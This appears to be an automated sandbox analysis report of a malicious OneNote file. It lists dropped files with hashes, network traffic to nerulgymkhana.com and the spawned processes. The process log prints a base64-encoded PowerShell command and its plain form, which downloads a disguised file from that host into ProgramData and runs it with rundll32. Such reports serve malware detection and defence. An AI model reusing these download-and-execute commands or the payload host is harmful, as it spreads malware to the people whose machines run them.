                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{FB2EE13B-F817-4FC6-B2E2-D84FD8BC051C}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{FB337C79-11CC-4E37-89F4-15AA6C1F0230}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{FEC04CEE-032C-46B1-8E29-C90A05EE6A84}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{FFA84DA8-2022-42CB-9F56-9EC206F00F40}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3873
                                                                                                                                                    Entropy (8bit):3.501048816931451
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:W8CLdO1BjIFAbqzqgdCDDGTCDeydRCLdO1Bjh7+xGqzWk7dCDGWG5CDeUgH:D+HqfGfyzGLZhBU4
                                                                                                                                                    MD5:0B1CF738D2C3D99B709D0AC07694E766
                                                                                                                                                    SHA1:15B2457F33A78FCBC230D92D6221539683A05371
                                                                                                                                                    SHA-256:9AE64A5C34132199E42353997C1D1F73757AE183A07366EB31AA9E23C00929F1
                                                                                                                                                    SHA-512:FE5E2B53CFFF1532927DB6F582105200AA8A9AFB35455158992D66035D9C2DA3362A5E0FCF28FCFCD27213F43F37944DD931EDD1FE0E5A45D35398C2FA7E3CBF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:...................................FL..................F.@.. .....Q{.......p;....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.HV......................V......M&.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.HV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.HV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..HV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S1NW5J7K0BC7F9ORQZ0V.temp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3873
                                                                                                                                                    Entropy (8bit):3.501048816931451
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:W8CLdO1BjIFAbqzqgdCDDGTCDeydRCLdO1Bjh7+xGqzWk7dCDGWG5CDeUgH:D+HqfGfyzGLZhBU4
                                                                                                                                                    MD5:0B1CF738D2C3D99B709D0AC07694E766
                                                                                                                                                    SHA1:15B2457F33A78FCBC230D92D6221539683A05371
                                                                                                                                                    SHA-256:9AE64A5C34132199E42353997C1D1F73757AE183A07366EB31AA9E23C00929F1
                                                                                                                                                    SHA-512:FE5E2B53CFFF1532927DB6F582105200AA8A9AFB35455158992D66035D9C2DA3362A5E0FCF28FCFCD27213F43F37944DD931EDD1FE0E5A45D35398C2FA7E3CBF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:...................................FL..................F.@.. .....Q{.......p;....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.HV......................V......M&.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.HV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.HV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..HV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Wed Feb 8 02:53:44 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1251
                                                                                                                                                    Entropy (8bit):4.689639950465645
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8lo2z+LdOEwKPMsCh7+BAyNqzWFUTdCDhxYUURg3s7aB6m:8xCLdO1Bjh7+SGqzWFwdCDtBJB6
                                                                                                                                                    MD5:BB5CDC9B85FFA2D9C2F1B7AC11A9C28C
                                                                                                                                                    SHA1:E0A6B0466F8131533F77DF44CB0D3C02E27D344A
                                                                                                                                                    SHA-256:163B176B972E639C21ED9EC37AEA05257F2D00FC3AB09B2E1DDC7B4EFE93E5E8
                                                                                                                                                    SHA-512:641E61B5B70FBD77D8BE170A367C87260D92F3D31EFFDA0B0A59C2D2473CC57376E70135CA5B46C8FDA98757E8C8243BDAACBA4DE1CCD4720BAF599BD4A206DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:L..................F.... ....>-.........p;...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.HV......................V......M&.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.HV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.HV.......]......................&.O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.HV................................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z|...K.J.........`.......X.......124406...........!a..%.H.VZAj...]..........

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:data
                                                                                                                                                    Entropy (8bit):5.9136949972162425
                                                                                                                                                    TrID:
                                                                                                                                                    • Microsoft OneNote note (16024/2) 100.00%
                                                                                                                                                    File name:Original.one
                                                                                                                                                    File size:159152
                                                                                                                                                    MD5:f727e5b082e13d521668e2908b3b7607
                                                                                                                                                    SHA1:4eb0f8309b33e7f79cfa2d37523690dbe1ad0c97
                                                                                                                                                    SHA256:8529b2ec8ed9d701904b8e2560cb3f12d049fedecb588102b5baf6d7a4c7830a
                                                                                                                                                    SHA512:feb7163c3e0151449e116898a14f0cd7d2611c3b03b34686384c0b15744be254646b45bea5d2e404cbade4291394a6af9cf69820d4c85120d728ddf1c2c109e7
                                                                                                                                                    SSDEEP:3072:ggS2EJbyYeMYkKkyX3DWvLLATiRMS2jFuRgbLw:ZhjZrHDgtSjA
                                                                                                                                                    TLSH:22F3C025B191865ADB29827A0AE77F74B373BE029591531FDFB72A1C4DF0248CC9068F
                                                                                                                                                    File Content Preview:.R\{...M..Sx.)..5._....O....7...................?......I........*...*...*...*.......................................................................@...................h...............8f......0....m..............\.}._..M.K..?E.aE........R..@..N.&..5......

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:d4dce0626664606c

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 7, 2023 19:53:33.641510010 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.641582966 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.641686916 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.657001972 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.657032967 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.763775110 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.763938904 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.768485069 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.768502951 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.768893957 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.787776947 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.787820101 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.825587034 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.825691938 CET44349704109.203.123.62192.168.2.3
                                                                                                                                                    Feb 7, 2023 19:53:33.825789928 CET49704443192.168.2.3109.203.123.62
                                                                                                                                                    Feb 7, 2023 19:53:33.828608036 CET49704443192.168.2.3109.203.123.62

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 7, 2023 19:53:33.552377939 CET5784053192.168.2.38.8.8.8
                                                                                                                                                    Feb 7, 2023 19:53:33.596184015 CET53578408.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Feb 7, 2023 19:53:33.552377939 CET192.168.2.38.8.8.80x8bd5Standard query (0)nerulgymkhana.comA (IP address)IN (0x0001)false

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Feb 7, 2023 19:53:33.596184015 CET8.8.8.8192.168.2.30x8bd5No error (0)nerulgymkhana.com109.203.123.62A (IP address)IN (0x0001)false

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • nerulgymkhana.com

                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349704109.203.123.62443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2023-02-07 18:53:33 UTC0OUTGET /CCoN/01.gif HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                    Host: nerulgymkhana.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2023-02-07 18:53:33 UTC0INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 07 Feb 2023 18:53:33 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Connection: close


                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:19:53:21
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one
                                                                                                                                                    Imagebase:0x830000
                                                                                                                                                    File size:1676072 bytes
                                                                                                                                                    MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:19:53:26
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
                                                                                                                                                    Imagebase:0x7ff707bb0000
                                                                                                                                                    File size:273920 bytes
                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:19:53:26
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:19:53:26
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
                                                                                                                                                    Imagebase:0x7ff703e80000
                                                                                                                                                    File size:447488 bytes
                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:19:53:30
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
                                                                                                                                                    Imagebase:0x7ff707bb0000
                                                                                                                                                    File size:273920 bytes
                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:19:53:30
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:19:53:31
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg
                                                                                                                                                    Imagebase:0x7ff703e80000
                                                                                                                                                    File size:447488 bytes
                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                    General

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:19:53:33
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:rundll32 C:\programdata\putty.jpg,Wind
                                                                                                                                                    Imagebase:0x7ff649500000
                                                                                                                                                    File size:69632 bytes
                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:19:53:44
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/tsr
                                                                                                                                                    Imagebase:0xed0000
                                                                                                                                                    File size:157872 bytes
                                                                                                                                                    MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
